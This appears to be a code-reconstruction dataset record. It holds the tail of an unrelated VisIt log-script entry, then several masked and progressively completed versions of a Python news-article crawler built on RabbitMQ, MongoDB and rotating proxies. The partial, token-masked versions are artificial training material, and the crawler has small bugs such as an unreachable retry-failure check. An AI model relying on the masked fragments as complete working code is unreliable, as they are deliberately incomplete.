"step-1": "# Visit 2.12.3 log file\nScriptVersion = \"2.12.3\"\nif ScriptVersion != Version():\n print \"This script is for VisIt %s. It may not work with version %s\" % (ScriptVersion, Version())\nvisit.ShowAllWindows()\nvisit.ShowAllWindows()\nvisit.OpenDatabase(\"test.vtk\", 0)\n# The UpdateDBPluginInfo RPC is not supported in the VisIt module so it will not be logged.\nvisit.AddPlot(\"Pseudocolor\", \"scalars\", 1, 1)\nvisit.DrawPlots()\nSaveWindowAtts = visit.SaveWindowAttributes()\nSaveWindowAtts.outputToCurrentDirectory = 1\nSaveWindowAtts.outputDirectory = \".\"\nSaveWindowAtts.fileName = \"visit\"\nSaveWindowAtts.family = 1\nSaveWindowAtts.format = SaveWindowAtts.PNG # BMP, CURVE, JPEG, OBJ, PNG, POSTSCRIPT, POVRAY, PPM, RGB, STL, TIFF, ULTRA, VTK, PLY\nSaveWindowAtts.width = 1024\nSaveWindowAtts.height = 1024\nSaveWindowAtts.screenCapture = 0\nSaveWindowAtts.saveTiled = 0\nSaveWindowAtts.quality = 80\nSaveWindowAtts.progressive = 0\nSaveWindowAtts.binary = 0\nSaveWindowAtts.stereo = 0\nSaveWindowAtts.compression = SaveWindowAtts.PackBits # None, PackBits, Jpeg, Deflate\nSaveWindowAtts.forceMerge = 0\nSaveWindowAtts.resConstraint = SaveWindowAtts.ScreenProportions # NoConstraint, EqualWidthHeight, ScreenProportions\nSaveWindowAtts.advancedMultiWindowSave = 0\nvisit.SetSaveWindowAttributes(SaveWindowAtts)\nvisit.SaveWindow()\n# Begin spontaneous state\nView3DAtts = visit.View3DAttributes()\nView3DAtts.viewNormal = (0.264045, 0.220135, 0.939053)\nView3DAtts.focus = (1, 1, 1)\nView3DAtts.viewUp = (0.100817, 0.961974, -0.253856)\nView3DAtts.viewAngle = 30\nView3DAtts.parallelScale = 1.73205\nView3DAtts.nearPlane = -3.4641\nView3DAtts.farPlane = 3.4641\nView3DAtts.imagePan = (0, 0)\nView3DAtts.imageZoom = 1\nView3DAtts.perspective = 1\nView3DAtts.eyeAngle = 2\nView3DAtts.centerOfRotationSet = 0\nView3DAtts.centerOfRotation = (1, 1, 1)\nView3DAtts.axis3DScaleFlag = 0\nView3DAtts.axis3DScales = (1, 1, 1)\nView3DAtts.shear = (0, 0, 1)\nView3DAtts.windowValid = 1\nvisit.SetView3D(View3DAtts)\n# End spontaneous state\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class CrawlerDetail:
def __init__(self):
self.proxy = Proxies()
def start_consume(self):
channel = connection.channel()
channel.queue_declare(queue='usual_article')
channel.basic_qos(prefetch_count=1)
channel.basic_consume(self.consume_article_detail_url, queue=
'usual_article', no_ack=False)
channel.start_consuming()
<|reserved_special_token_0|>
def consume_article_detail_url(self, ch, method, properties, body):
"""
文章详情页解析
:param ch:
:param method:
:param properties:
:param body: json格式字符串
:return:
"""
message = json.loads(body.decode())
for i in range(10):
try:
html = requests.get(message['detail_url'], timeout=10,
proxies=next(self.proxy))
connection.process_data_events()
if html.status_code == 200:
break
except Exception as e:
connection.process_data_events()
if i == 10:
log.error('请求文章详情页{}失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
try:
con = html.content.decode()
except:
try:
con = html.content.decode('gbk')
except:
log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
return
page = etree.HTML(con)
detail_config_dict = collection.find_one({'source': message['source']})
if detail_config_dict['body'] is not None:
try:
for pattern in detail_config_dict['body']:
if page.xpath(pattern):
article_body = page.xpath(pattern)[0]
message['body'] = etree.tounicode(article_body)
break
except:
log.error('xpath语句未能解析body')
ch.basic_ack(delivery_tag=method.delivery_tag)
return
if detail_config_dict['comment_count'] is not None:
message['comment_count'] = page.xpath(detail_config_dict[
'comment_count'])[0]
if detail_config_dict['like_count'] is not None:
message['like_count'] = page.xpath(detail_config_dict['like_count']
)[0]
if detail_config_dict['read_num'] is not None:
message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]
if detail_config_dict['author'] is not None:
try:
message['author'] = page.xpath(detail_config_dict['author'])[0]
except:
log.info('没有提取到{}作者字段'.format(message['detail_url']))
if detail_config_dict['post_time'] is not None:
try:
message['post_time'] = page.xpath(detail_config_dict[
'post_time'])[0]
except:
log.info('没有提取到{}文章发表时间'.format(message['detail_url']))
if detail_config_dict['tag'] is not None:
message['tag'] = page.xpath(detail_config_dict['tag'])[0]
if detail_config_dict['source_detail'] is not None:
try:
message['source_detail'] = page.xpath(detail_config_dict[
'source_detail'])[0]
except:
log.info('没有提取到{}文章详细来源'.format(message['detail_url']))
self.clean(message)
produce_channel = connection.channel()
produce_channel.queue_declare('article_body')
article_text = json.dumps(message)
produce_channel.basic_publish(exchange='', routing_key=
'article_body', body=article_text)
log.info('{}已经放入清洗队列'.format(message['title']))
ch.basic_ack(delivery_tag=method.delivery_tag)
produce_channel.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CrawlerDetail:
def __init__(self):
self.proxy = Proxies()
def start_consume(self):
channel = connection.channel()
channel.queue_declare(queue='usual_article')
channel.basic_qos(prefetch_count=1)
channel.basic_consume(self.consume_article_detail_url, queue=
'usual_article', no_ack=False)
channel.start_consuming()
def clean(self, message):
"""
作者,发布时间,详细来源字段清洗
:param message:
:return:
"""
clean = clean_coll.find_one({'source': message['source']})
if clean['post_time'] is not None:
try:
post_time = re.search(clean['post_time'], message[
'post_time'], re.S | re.M).group(1)
message['post_time'] = post_time
except:
log.info('post_time清洗失败{}'.format(message['post_time']))
message['post_time'] = None
if clean['author'] is not None:
try:
author = re.search(clean['author'], message['author']).group(1)
message['author'] = author
except:
log.info('author清洗失败{}'.format(message['author']))
message['author'] = None
if clean['source_detail'] is not None:
try:
source_detail = re.search(clean['source_detail'], message[
'source_detail'], re.S | re.M).group(1)
message['source_detail'] = source_detail
except:
log.info('source_detail清洗失败{}'.format(message['source_detail'])
)
message['source_detail'] = None
return message
def consume_article_detail_url(self, ch, method, properties, body):
"""
文章详情页解析
:param ch:
:param method:
:param properties:
:param body: json格式字符串
:return:
"""
message = json.loads(body.decode())
for i in range(10):
try:
html = requests.get(message['detail_url'], timeout=10,
proxies=next(self.proxy))
connection.process_data_events()
if html.status_code == 200:
break
except Exception as e:
connection.process_data_events()
if i == 10:
log.error('请求文章详情页{}失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
try:
con = html.content.decode()
except:
try:
con = html.content.decode('gbk')
except:
log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
return
page = etree.HTML(con)
detail_config_dict = collection.find_one({'source': message['source']})
if detail_config_dict['body'] is not None:
try:
for pattern in detail_config_dict['body']:
if page.xpath(pattern):
article_body = page.xpath(pattern)[0]
message['body'] = etree.tounicode(article_body)
break
except:
log.error('xpath语句未能解析body')
ch.basic_ack(delivery_tag=method.delivery_tag)
return
if detail_config_dict['comment_count'] is not None:
message['comment_count'] = page.xpath(detail_config_dict[
'comment_count'])[0]
if detail_config_dict['like_count'] is not None:
message['like_count'] = page.xpath(detail_config_dict['like_count']
)[0]
if detail_config_dict['read_num'] is not None:
message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]
if detail_config_dict['author'] is not None:
try:
message['author'] = page.xpath(detail_config_dict['author'])[0]
except:
log.info('没有提取到{}作者字段'.format(message['detail_url']))
if detail_config_dict['post_time'] is not None:
try:
message['post_time'] = page.xpath(detail_config_dict[
'post_time'])[0]
except:
log.info('没有提取到{}文章发表时间'.format(message['detail_url']))
if detail_config_dict['tag'] is not None:
message['tag'] = page.xpath(detail_config_dict['tag'])[0]
if detail_config_dict['source_detail'] is not None:
try:
message['source_detail'] = page.xpath(detail_config_dict[
'source_detail'])[0]
except:
log.info('没有提取到{}文章详细来源'.format(message['detail_url']))
self.clean(message)
produce_channel = connection.channel()
produce_channel.queue_declare('article_body')
article_text = json.dumps(message)
produce_channel.basic_publish(exchange='', routing_key=
'article_body', body=article_text)
log.info('{}已经放入清洗队列'.format(message['title']))
ch.basic_ack(delivery_tag=method.delivery_tag)
produce_channel.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
m.admin.authenticate(setting['mongo_config']['user_name'], setting[
'mongo_config']['password'])
<|reserved_special_token_0|>
class CrawlerDetail:
def __init__(self):
self.proxy = Proxies()
def start_consume(self):
channel = connection.channel()
channel.queue_declare(queue='usual_article')
channel.basic_qos(prefetch_count=1)
channel.basic_consume(self.consume_article_detail_url, queue=
'usual_article', no_ack=False)
channel.start_consuming()
def clean(self, message):
"""
作者,发布时间,详细来源字段清洗
:param message:
:return:
"""
clean = clean_coll.find_one({'source': message['source']})
if clean['post_time'] is not None:
try:
post_time = re.search(clean['post_time'], message[
'post_time'], re.S | re.M).group(1)
message['post_time'] = post_time
except:
log.info('post_time清洗失败{}'.format(message['post_time']))
message['post_time'] = None
if clean['author'] is not None:
try:
author = re.search(clean['author'], message['author']).group(1)
message['author'] = author
except:
log.info('author清洗失败{}'.format(message['author']))
message['author'] = None
if clean['source_detail'] is not None:
try:
source_detail = re.search(clean['source_detail'], message[
'source_detail'], re.S | re.M).group(1)
message['source_detail'] = source_detail
except:
log.info('source_detail清洗失败{}'.format(message['source_detail'])
)
message['source_detail'] = None
return message
def consume_article_detail_url(self, ch, method, properties, body):
"""
文章详情页解析
:param ch:
:param method:
:param properties:
:param body: json格式字符串
:return:
"""
message = json.loads(body.decode())
for i in range(10):
try:
html = requests.get(message['detail_url'], timeout=10,
proxies=next(self.proxy))
connection.process_data_events()
if html.status_code == 200:
break
except Exception as e:
connection.process_data_events()
if i == 10:
log.error('请求文章详情页{}失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
try:
con = html.content.decode()
except:
try:
con = html.content.decode('gbk')
except:
log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
return
page = etree.HTML(con)
detail_config_dict = collection.find_one({'source': message['source']})
if detail_config_dict['body'] is not None:
try:
for pattern in detail_config_dict['body']:
if page.xpath(pattern):
article_body = page.xpath(pattern)[0]
message['body'] = etree.tounicode(article_body)
break
except:
log.error('xpath语句未能解析body')
ch.basic_ack(delivery_tag=method.delivery_tag)
return
if detail_config_dict['comment_count'] is not None:
message['comment_count'] = page.xpath(detail_config_dict[
'comment_count'])[0]
if detail_config_dict['like_count'] is not None:
message['like_count'] = page.xpath(detail_config_dict['like_count']
)[0]
if detail_config_dict['read_num'] is not None:
message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]
if detail_config_dict['author'] is not None:
try:
message['author'] = page.xpath(detail_config_dict['author'])[0]
except:
log.info('没有提取到{}作者字段'.format(message['detail_url']))
if detail_config_dict['post_time'] is not None:
try:
message['post_time'] = page.xpath(detail_config_dict[
'post_time'])[0]
except:
log.info('没有提取到{}文章发表时间'.format(message['detail_url']))
if detail_config_dict['tag'] is not None:
message['tag'] = page.xpath(detail_config_dict['tag'])[0]
if detail_config_dict['source_detail'] is not None:
try:
message['source_detail'] = page.xpath(detail_config_dict[
'source_detail'])[0]
except:
log.info('没有提取到{}文章详细来源'.format(message['detail_url']))
self.clean(message)
produce_channel = connection.channel()
produce_channel.queue_declare('article_body')
article_text = json.dumps(message)
produce_channel.basic_publish(exchange='', routing_key=
'article_body', body=article_text)
log.info('{}已经放入清洗队列'.format(message['title']))
ch.basic_ack(delivery_tag=method.delivery_tag)
produce_channel.close()
<|reserved_special_token_1|>
import requests
from lxml import etree
from pymongo import MongoClient
from lib.rabbitmq import Rabbit
from lib.log import LogHandler
from lib.proxy_iterator import Proxies
import yaml
import json
import datetime
import re
import time
setting = yaml.load(open('config_local.yaml'))
log = LogHandler('article_consumer')
m = MongoClient(setting['mongo_config']['config_host'], setting[
'mongo_config']['port'])
m.admin.authenticate(setting['mongo_config']['user_name'], setting[
'mongo_config']['password'])
collection = m[setting['mongo_config']['config_db']][setting['mongo_config'
]['coll_detail']]
clean_coll = m[setting['mongo_config']['config_db']][setting['mongo_config'
]['clean']]
rabbit = Rabbit(setting['rabbitmq_host'], setting['rabbitmq_port'])
connection = rabbit.connection
class CrawlerDetail:
def __init__(self):
self.proxy = Proxies()
def start_consume(self):
channel = connection.channel()
channel.queue_declare(queue='usual_article')
channel.basic_qos(prefetch_count=1)
channel.basic_consume(self.consume_article_detail_url, queue=
'usual_article', no_ack=False)
channel.start_consuming()
def clean(self, message):
"""
作者,发布时间,详细来源字段清洗
:param message:
:return:
"""
clean = clean_coll.find_one({'source': message['source']})
if clean['post_time'] is not None:
try:
post_time = re.search(clean['post_time'], message[
'post_time'], re.S | re.M).group(1)
message['post_time'] = post_time
except:
log.info('post_time清洗失败{}'.format(message['post_time']))
message['post_time'] = None
if clean['author'] is not None:
try:
author = re.search(clean['author'], message['author']).group(1)
message['author'] = author
except:
log.info('author清洗失败{}'.format(message['author']))
message['author'] = None
if clean['source_detail'] is not None:
try:
source_detail = re.search(clean['source_detail'], message[
'source_detail'], re.S | re.M).group(1)
message['source_detail'] = source_detail
except:
log.info('source_detail清洗失败{}'.format(message['source_detail'])
)
message['source_detail'] = None
return message
def consume_article_detail_url(self, ch, method, properties, body):
"""
文章详情页解析
:param ch:
:param method:
:param properties:
:param body: json格式字符串
:return:
"""
message = json.loads(body.decode())
for i in range(10):
try:
html = requests.get(message['detail_url'], timeout=10,
proxies=next(self.proxy))
connection.process_data_events()
if html.status_code == 200:
break
except Exception as e:
connection.process_data_events()
if i == 10:
log.error('请求文章详情页{}失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
try:
con = html.content.decode()
except:
try:
con = html.content.decode('gbk')
except:
log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
return
page = etree.HTML(con)
detail_config_dict = collection.find_one({'source': message['source']})
if detail_config_dict['body'] is not None:
try:
for pattern in detail_config_dict['body']:
if page.xpath(pattern):
article_body = page.xpath(pattern)[0]
message['body'] = etree.tounicode(article_body)
break
except:
log.error('xpath语句未能解析body')
ch.basic_ack(delivery_tag=method.delivery_tag)
return
if detail_config_dict['comment_count'] is not None:
message['comment_count'] = page.xpath(detail_config_dict[
'comment_count'])[0]
if detail_config_dict['like_count'] is not None:
message['like_count'] = page.xpath(detail_config_dict['like_count']
)[0]
if detail_config_dict['read_num'] is not None:
message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]
if detail_config_dict['author'] is not None:
try:
message['author'] = page.xpath(detail_config_dict['author'])[0]
except:
log.info('没有提取到{}作者字段'.format(message['detail_url']))
if detail_config_dict['post_time'] is not None:
try:
message['post_time'] = page.xpath(detail_config_dict[
'post_time'])[0]
except:
log.info('没有提取到{}文章发表时间'.format(message['detail_url']))
if detail_config_dict['tag'] is not None:
message['tag'] = page.xpath(detail_config_dict['tag'])[0]
if detail_config_dict['source_detail'] is not None:
try:
message['source_detail'] = page.xpath(detail_config_dict[
'source_detail'])[0]
except:
log.info('没有提取到{}文章详细来源'.format(message['detail_url']))
self.clean(message)
produce_channel = connection.channel()
produce_channel.queue_declare('article_body')
article_text = json.dumps(message)
produce_channel.basic_publish(exchange='', routing_key=
'article_body', body=article_text)
log.info('{}已经放入清洗队列'.format(message['title']))
ch.basic_ack(delivery_tag=method.delivery_tag)
produce_channel.close()
<|reserved_special_token_1|>
import requests
from lxml import etree
from pymongo import MongoClient
from lib.rabbitmq import Rabbit
from lib.log import LogHandler
from lib.proxy_iterator import Proxies
import yaml
import json
import datetime
import re
import time
setting = yaml.load(open('config_local.yaml'))
log = LogHandler('article_consumer')
m = MongoClient(setting['mongo_config']['config_host'], setting['mongo_config']['port'])
m.admin.authenticate(setting['mongo_config']['user_name'],setting['mongo_config']['password'] )
collection = m[setting['mongo_config']['config_db']][setting['mongo_config']['coll_detail']]
clean_coll = m[setting['mongo_config']['config_db']][setting['mongo_config']['clean']]
rabbit = Rabbit(setting['rabbitmq_host'],setting['rabbitmq_port'])
connection = rabbit.connection
class CrawlerDetail:
def __init__(self):
self.proxy = Proxies()
def start_consume(self):
channel = connection.channel()
channel.queue_declare(queue='usual_article')
channel.basic_qos(prefetch_count=1)
channel.basic_consume(self.consume_article_detail_url,
queue='usual_article',
no_ack=False)
channel.start_consuming()
def clean(self,message):
"""
作者,发布时间,详细来源字段清洗
:param message:
:return:
"""
clean = clean_coll.find_one({'source': message['source']})
if clean['post_time'] is not None:
try:
post_time = re.search(clean['post_time'],message['post_time'],re.S|re.M).group(1)
message['post_time'] = post_time
except:
log.info("post_time清洗失败{}".format(message['post_time']))
message['post_time'] = None
if clean['author'] is not None:
try:
author = re.search(clean['author'],message['author']).group(1)
message['author'] = author
except:
log.info("author清洗失败{}".format(message['author']))
message['author'] = None
if clean['source_detail'] is not None:
try:
source_detail = re.search(clean['source_detail'],message['source_detail'],re.S|re.M).group(1)
message['source_detail'] = source_detail
except:
log.info("source_detail清洗失败{}".format(message['source_detail']))
message['source_detail'] = None
return message
def consume_article_detail_url(self,ch, method, properties, body):
"""
文章详情页解析
:param ch:
:param method:
:param properties:
:param body: json格式字符串
:return:
"""
message = json.loads(body.decode())
for i in range(10):
try:
html = requests.get(message['detail_url'],timeout=10,proxies=next(self.proxy))
connection.process_data_events()
if html.status_code == 200:
break
except Exception as e:
connection.process_data_events()
if i == 10:
log.error("请求文章详情页{}失败".format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
try:
con = html.content.decode()
except:
try:
con = html.content.decode('gbk')
except:
log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
return
page = etree.HTML(con)
# 获取详情页的解析方式
detail_config_dict = collection.find_one({'source': message['source']})
if detail_config_dict['body'] is not None:
try:
for pattern in detail_config_dict['body']:
if page.xpath(pattern):
article_body = page.xpath(pattern)[0]
message['body'] = etree.tounicode(article_body)
break
except:
log.error('xpath语句未能解析body')
ch.basic_ack(delivery_tag=method.delivery_tag)
return
if detail_config_dict['comment_count'] is not None:
message['comment_count'] = page.xpath(detail_config_dict['comment_count'])[0]
if detail_config_dict['like_count'] is not None:
message['like_count'] = page.xpath(detail_config_dict['like_count'])[0]
if detail_config_dict['read_num'] is not None:
message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]
if detail_config_dict['author'] is not None:
try:
message['author'] = page.xpath(detail_config_dict['author'])[0]
except:
log.info("没有提取到{}作者字段".format(message['detail_url']))
if detail_config_dict['post_time'] is not None:
try:
message['post_time'] = page.xpath(detail_config_dict['post_time'])[0]
except:
log.info("没有提取到{}文章发表时间".format(message['detail_url']))
if detail_config_dict['tag'] is not None:
message['tag'] = page.xpath(detail_config_dict['tag'])[0]
if detail_config_dict['source_detail'] is not None:
try:
message['source_detail'] = page.xpath(detail_config_dict['source_detail'])[0]
except:
log.info("没有提取到{}文章详细来源".format(message['detail_url']))
self.clean(message)
# 放入消息队列做正文替换清洗
produce_channel = connection.channel()
produce_channel.queue_declare('article_body')
article_text = json.dumps(message)
produce_channel.basic_publish(exchange='',
routing_key='article_body',
body=article_text)
log.info('{}已经放入清洗队列'.format(message['title']))
ch.basic_ack(delivery_tag=method.delivery_tag)
produce_channel.close()
|
flexible
|
{
"blob_id": "cd1d8a73b6958775a212d80b50de74f4b4de18bf",
"index": 6319,
"step-1": "<mask token>\n\n\nclass CrawlerDetail:\n\n def __init__(self):\n self.proxy = Proxies()\n\n def start_consume(self):\n channel = connection.channel()\n channel.queue_declare(queue='usual_article')\n channel.basic_qos(prefetch_count=1)\n channel.basic_consume(self.consume_article_detail_url, queue=\n 'usual_article', no_ack=False)\n channel.start_consuming()\n <mask token>\n\n def consume_article_detail_url(self, ch, method, properties, body):\n \"\"\"\n 文章详情页解析\n :param ch:\n :param method:\n :param properties:\n :param body: json格式字符串\n :return:\n \"\"\"\n message = json.loads(body.decode())\n for i in range(10):\n try:\n html = requests.get(message['detail_url'], timeout=10,\n proxies=next(self.proxy))\n connection.process_data_events()\n if html.status_code == 200:\n break\n except Exception as e:\n connection.process_data_events()\n if i == 10:\n log.error('请求文章详情页{}失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n try:\n con = html.content.decode()\n except:\n try:\n con = html.content.decode('gbk')\n except:\n log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n page = etree.HTML(con)\n detail_config_dict = collection.find_one({'source': message['source']})\n if detail_config_dict['body'] is not None:\n try:\n for pattern in detail_config_dict['body']:\n if page.xpath(pattern):\n article_body = page.xpath(pattern)[0]\n message['body'] = etree.tounicode(article_body)\n break\n except:\n log.error('xpath语句未能解析body')\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n if detail_config_dict['comment_count'] is not None:\n message['comment_count'] = page.xpath(detail_config_dict[\n 'comment_count'])[0]\n if detail_config_dict['like_count'] is not None:\n message['like_count'] = page.xpath(detail_config_dict['like_count']\n )[0]\n if detail_config_dict['read_num'] is not None:\n message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]\n if detail_config_dict['author'] is not None:\n try:\n message['author'] = page.xpath(detail_config_dict['author'])[0]\n except:\n log.info('没有提取到{}作者字段'.format(message['detail_url']))\n if detail_config_dict['post_time'] is not None:\n try:\n message['post_time'] = page.xpath(detail_config_dict[\n 'post_time'])[0]\n except:\n log.info('没有提取到{}文章发表时间'.format(message['detail_url']))\n if detail_config_dict['tag'] is not None:\n message['tag'] = page.xpath(detail_config_dict['tag'])[0]\n if detail_config_dict['source_detail'] is not None:\n try:\n message['source_detail'] = page.xpath(detail_config_dict[\n 'source_detail'])[0]\n except:\n log.info('没有提取到{}文章详细来源'.format(message['detail_url']))\n self.clean(message)\n produce_channel = connection.channel()\n produce_channel.queue_declare('article_body')\n article_text = json.dumps(message)\n produce_channel.basic_publish(exchange='', routing_key=\n 'article_body', body=article_text)\n log.info('{}已经放入清洗队列'.format(message['title']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n produce_channel.close()\n",
"step-2": "<mask token>\n\n\nclass CrawlerDetail:\n\n def __init__(self):\n self.proxy = Proxies()\n\n def start_consume(self):\n channel = connection.channel()\n channel.queue_declare(queue='usual_article')\n channel.basic_qos(prefetch_count=1)\n channel.basic_consume(self.consume_article_detail_url, queue=\n 'usual_article', no_ack=False)\n channel.start_consuming()\n\n def clean(self, message):\n \"\"\"\n 作者,发布时间,详细来源字段清洗\n :param message:\n :return:\n \"\"\"\n clean = clean_coll.find_one({'source': message['source']})\n if clean['post_time'] is not None:\n try:\n post_time = re.search(clean['post_time'], message[\n 'post_time'], re.S | re.M).group(1)\n message['post_time'] = post_time\n except:\n log.info('post_time清洗失败{}'.format(message['post_time']))\n message['post_time'] = None\n if clean['author'] is not None:\n try:\n author = re.search(clean['author'], message['author']).group(1)\n message['author'] = author\n except:\n log.info('author清洗失败{}'.format(message['author']))\n message['author'] = None\n if clean['source_detail'] is not None:\n try:\n source_detail = re.search(clean['source_detail'], message[\n 'source_detail'], re.S | re.M).group(1)\n message['source_detail'] = source_detail\n except:\n log.info('source_detail清洗失败{}'.format(message['source_detail'])\n )\n message['source_detail'] = None\n return message\n\n def consume_article_detail_url(self, ch, method, properties, body):\n \"\"\"\n 文章详情页解析\n :param ch:\n :param method:\n :param properties:\n :param body: json格式字符串\n :return:\n \"\"\"\n message = json.loads(body.decode())\n for i in range(10):\n try:\n html = requests.get(message['detail_url'], timeout=10,\n proxies=next(self.proxy))\n connection.process_data_events()\n if html.status_code == 200:\n break\n except Exception as e:\n connection.process_data_events()\n if i == 10:\n log.error('请求文章详情页{}失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n try:\n con = html.content.decode()\n except:\n try:\n con = html.content.decode('gbk')\n except:\n log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n page = etree.HTML(con)\n detail_config_dict = collection.find_one({'source': message['source']})\n if detail_config_dict['body'] is not None:\n try:\n for pattern in detail_config_dict['body']:\n if page.xpath(pattern):\n article_body = page.xpath(pattern)[0]\n message['body'] = etree.tounicode(article_body)\n break\n except:\n log.error('xpath语句未能解析body')\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n if detail_config_dict['comment_count'] is not None:\n message['comment_count'] = page.xpath(detail_config_dict[\n 'comment_count'])[0]\n if detail_config_dict['like_count'] is not None:\n message['like_count'] = page.xpath(detail_config_dict['like_count']\n )[0]\n if detail_config_dict['read_num'] is not None:\n message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]\n if detail_config_dict['author'] is not None:\n try:\n message['author'] = page.xpath(detail_config_dict['author'])[0]\n except:\n log.info('没有提取到{}作者字段'.format(message['detail_url']))\n if detail_config_dict['post_time'] is not None:\n try:\n message['post_time'] = page.xpath(detail_config_dict[\n 'post_time'])[0]\n except:\n log.info('没有提取到{}文章发表时间'.format(message['detail_url']))\n if detail_config_dict['tag'] is not None:\n message['tag'] = page.xpath(detail_config_dict['tag'])[0]\n if detail_config_dict['source_detail'] is not None:\n try:\n message['source_detail'] = page.xpath(detail_config_dict[\n 'source_detail'])[0]\n except:\n log.info('没有提取到{}文章详细来源'.format(message['detail_url']))\n self.clean(message)\n produce_channel = connection.channel()\n produce_channel.queue_declare('article_body')\n article_text = json.dumps(message)\n produce_channel.basic_publish(exchange='', routing_key=\n 'article_body', body=article_text)\n log.info('{}已经放入清洗队列'.format(message['title']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n produce_channel.close()\n",
"step-3": "<mask token>\nm.admin.authenticate(setting['mongo_config']['user_name'], setting[\n 'mongo_config']['password'])\n<mask token>\n\n\nclass CrawlerDetail:\n\n def __init__(self):\n self.proxy = Proxies()\n\n def start_consume(self):\n channel = connection.channel()\n channel.queue_declare(queue='usual_article')\n channel.basic_qos(prefetch_count=1)\n channel.basic_consume(self.consume_article_detail_url, queue=\n 'usual_article', no_ack=False)\n channel.start_consuming()\n\n def clean(self, message):\n \"\"\"\n 作者,发布时间,详细来源字段清洗\n :param message:\n :return:\n \"\"\"\n clean = clean_coll.find_one({'source': message['source']})\n if clean['post_time'] is not None:\n try:\n post_time = re.search(clean['post_time'], message[\n 'post_time'], re.S | re.M).group(1)\n message['post_time'] = post_time\n except:\n log.info('post_time清洗失败{}'.format(message['post_time']))\n message['post_time'] = None\n if clean['author'] is not None:\n try:\n author = re.search(clean['author'], message['author']).group(1)\n message['author'] = author\n except:\n log.info('author清洗失败{}'.format(message['author']))\n message['author'] = None\n if clean['source_detail'] is not None:\n try:\n source_detail = re.search(clean['source_detail'], message[\n 'source_detail'], re.S | re.M).group(1)\n message['source_detail'] = source_detail\n except:\n log.info('source_detail清洗失败{}'.format(message['source_detail'])\n )\n message['source_detail'] = None\n return message\n\n def consume_article_detail_url(self, ch, method, properties, body):\n \"\"\"\n 文章详情页解析\n :param ch:\n :param method:\n :param properties:\n :param body: json格式字符串\n :return:\n \"\"\"\n message = json.loads(body.decode())\n for i in range(10):\n try:\n html = requests.get(message['detail_url'], timeout=10,\n proxies=next(self.proxy))\n connection.process_data_events()\n if html.status_code == 200:\n break\n except Exception as e:\n connection.process_data_events()\n if i == 10:\n log.error('请求文章详情页{}失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n try:\n con = html.content.decode()\n except:\n try:\n con = html.content.decode('gbk')\n except:\n log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n page = etree.HTML(con)\n detail_config_dict = collection.find_one({'source': message['source']})\n if detail_config_dict['body'] is not None:\n try:\n for pattern in detail_config_dict['body']:\n if page.xpath(pattern):\n article_body = page.xpath(pattern)[0]\n message['body'] = etree.tounicode(article_body)\n break\n except:\n log.error('xpath语句未能解析body')\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n if detail_config_dict['comment_count'] is not None:\n message['comment_count'] = page.xpath(detail_config_dict[\n 'comment_count'])[0]\n if detail_config_dict['like_count'] is not None:\n message['like_count'] = page.xpath(detail_config_dict['like_count']\n )[0]\n if detail_config_dict['read_num'] is not None:\n message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]\n if detail_config_dict['author'] is not None:\n try:\n message['author'] = page.xpath(detail_config_dict['author'])[0]\n except:\n log.info('没有提取到{}作者字段'.format(message['detail_url']))\n if detail_config_dict['post_time'] is not None:\n try:\n message['post_time'] = page.xpath(detail_config_dict[\n 'post_time'])[0]\n except:\n log.info('没有提取到{}文章发表时间'.format(message['detail_url']))\n if detail_config_dict['tag'] is not None:\n message['tag'] = page.xpath(detail_config_dict['tag'])[0]\n if detail_config_dict['source_detail'] is not None:\n try:\n message['source_detail'] = page.xpath(detail_config_dict[\n 'source_detail'])[0]\n except:\n log.info('没有提取到{}文章详细来源'.format(message['detail_url']))\n self.clean(message)\n produce_channel = connection.channel()\n produce_channel.queue_declare('article_body')\n article_text = json.dumps(message)\n produce_channel.basic_publish(exchange='', routing_key=\n 'article_body', body=article_text)\n log.info('{}已经放入清洗队列'.format(message['title']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n produce_channel.close()\n",
